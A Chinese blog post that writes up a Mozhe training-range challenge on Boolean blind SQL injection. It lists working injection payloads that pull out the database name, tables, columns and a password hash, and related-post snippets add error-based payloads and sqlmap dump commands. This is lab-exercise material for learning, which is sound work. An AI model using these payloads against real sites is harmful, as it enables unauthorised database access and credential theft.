墨者SQL注入漏洞测试(布尔盲注)题解

最新推荐文章于 2023-04-21 10:37:46 发布
最新推荐文章于 2023-04-21 10:37:46 发布
阅读量468 收藏 2
点赞数
分类专栏: 做题记录 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zr1213159840/article/details/121877295
版权

题目明说是布尔盲注,所以直接通过if函数进行注入即可
先猜测下数据库的长度
id=1 and 1=if(lenfth(database())=10,1,2)
能看出来,数据库的长度是10,

接着猜数据库的名称,直接添加substr截取一位一位猜,最后猜出来数据库的名称是stromgroup
id=1 and 1=if(substr(database(),1,1)=‘s’,1,2)
在这里插入图片描述
接着猜库中包含的表有哪些,这个真的是手动搞了一个小时
id=1 and 1=if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘a’,1,2)–+
测出来第一个字母是m,接着慢慢修改,慢慢手动测试,得出第一个表是member,第二个表是notice,第三章表有没有不知道,没试。

既然知道有哪些表了,那么就慢慢猜表里面有哪些字段了
id=1 and 1=if(substr((select column_name from information_schema.columns where table_name like ‘%member%’ limit 0,1),1,1)=‘n’,1,2)
测试出是n开头后,凭借直觉测试应该出有两列分别是name,password。

列和表都有了,直接开始测试相应的字段的值吧
id=1 and 1=if(substr((select name from member limit 0,1),1,1)=‘m’,1,2)–+
能明显测试出来是mozhe的拼音而且有两个mozhe,按照题目的套路,肯定是第二个是正确答案,直接测试第二个的password,
id=1 and 1=if(substr((select password from member limit 1,1),1,1)=‘m’,1,2)–+
因为是md5的值,只能一个一个试了。
试出来的最终答案是:97fd70d9ca8aa02ea8dd67a3cc401ad3(手工太慢了,直接用sqlmap跑出来了)
解密后登录即可。

铁锤2号
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebShell文件上传漏洞分析溯源
02-22
WebShell文件上传漏洞
墨者学院-SQL注入漏洞测试布尔盲注
weixin_42939822的博客
03-20 4287
决心按部就班、由浅入深地去剖析下sql注入题目提供的靶场环境,完善自身解题思路。本题靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入题目。废话不多说啦,先附上题目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者 - SQL注入漏洞测试(布尔盲注)
weixin_43803070的博客
07-08 1399
** 一、报数据库名字 ** 1.根据浮动的通告进度条,找到sql注入点。 内容不变,判断是数字型注入。 http://219.153.49.228:44199/new_list.php?id=1 and 1=1 --+ 2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10 http://219.153.49.228:44199/new_list.php?id=1%...
墨者学院——SQL注入漏洞测试(布尔盲注)
2303_76679642的博客
04-21 389
9.最后看字段值: sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1,字段2,....) --dump --dbms mysql --batch。8.接着来查找表的字段:sqlmap -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 --columns --dbms mysql --batch。id=1 and 1=1,内容显示, 判断这个id的值类型是数字类型。
墨者学院-SQL注入漏洞测试(布尔盲注)
Fisher
12-01 3854
拿到题目之后打开网站发现如下界面 本以为是输入框存在注入,结果发现并不是,而是下面一段小字,发现存在id=1的字样 手工注入: 1.判断注入点:
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
墨者未必黑.pdf
12-26
墨者未必黑.pdf
墨者安全专家 3.7(更新)
11-03
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
墨者安全专家 v3.7.2.9
03-12
3、墨者漏洞修补 通过全面扫描windows和软件中存在的系统漏洞,一键完成补丁的下载与安装,及时排除系统的安全隐患。 4、墨者保护隐私 及时清理上网历史记录、网银注册信息、系统临时文件及cookies等,全面保护个人...
SQL注入题型(手工注入+sqlmap)
我了解豹女就像农民伯伯了解大米
06-27 1279
题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 目录 题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件 首先进行手工注入(用’以及and或者or来进行查看是否可以进行手工注入) 用sqlmap工具进行注入:(-u指定注入的网站链接,--tamper指定防止过滤关键字符,例如空格、union) 发现并没有要找的数据,回归题目:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。 首先进行手工注入(用’以及and或者or来进行查看是否可以
头歌-信息安全技术-实训04 数据库SQL注入漏洞
不服输的小乌龟
10-17 5443
搭建dvwa环境,包括1、搭建LAMP服务;2、部署dvwa服务;3、访问dvwa主页。
布尔盲注怎么用,一看你就明白了。布尔盲注原理+步骤+实战教程
热门推荐
wangyuxiang946的博客
03-16 2万+
写给每一个为了让自己变得更好,而坚持努力的你。
SQL注入-布尔盲注
weixin_45095113的博客
03-12 697
布尔盲注
SQL注入布尔盲注
DM766924的博客
09-13 1550
什么是布尔判断SQL注入? “布尔判断”指的是利用SQL语句**逻辑与(and)**操作,判断and两边的条件是否成立,SQL语句带入输入库查询后判断返回内容(通常返回值仅有非空和空两种状态),类似布尔型的true和false的两种状态。 布尔盲注步骤: 第1步:确认注入点 方法:通过增加 ’ 和增加--+注释符,语句从执行失败变为执行成功判断注入点 第2步:判断数据库版本 方法:主要因为5.0版本以下没有information_schema数据库,无法进行手动注入; 由于无法回显数据,利用逻辑
SQL注入-盲注布尔盲注与时间盲注
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4063
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者 - SQL注入漏洞测试(报错盲注)
吃肉唐僧的博客
07-07 2659
根据题意,用updatexml构造报错回显' and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+ 爆库 ' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+ 爆表' and updatexml(1,concat(0x7e,(select table_n...
墨者学院之布尔盲注
weixin_44926231的博客
08-08 335
环境 https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe 分析 ?id=1/ 报错 ?id=1-0 返回正常 id位置存在注入 进行手工注入 手工payload ascii(substr((select database()),1,1)) 得到数据库名:stormgroup a...
墨者靶场sql布尔盲注
最新发布
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值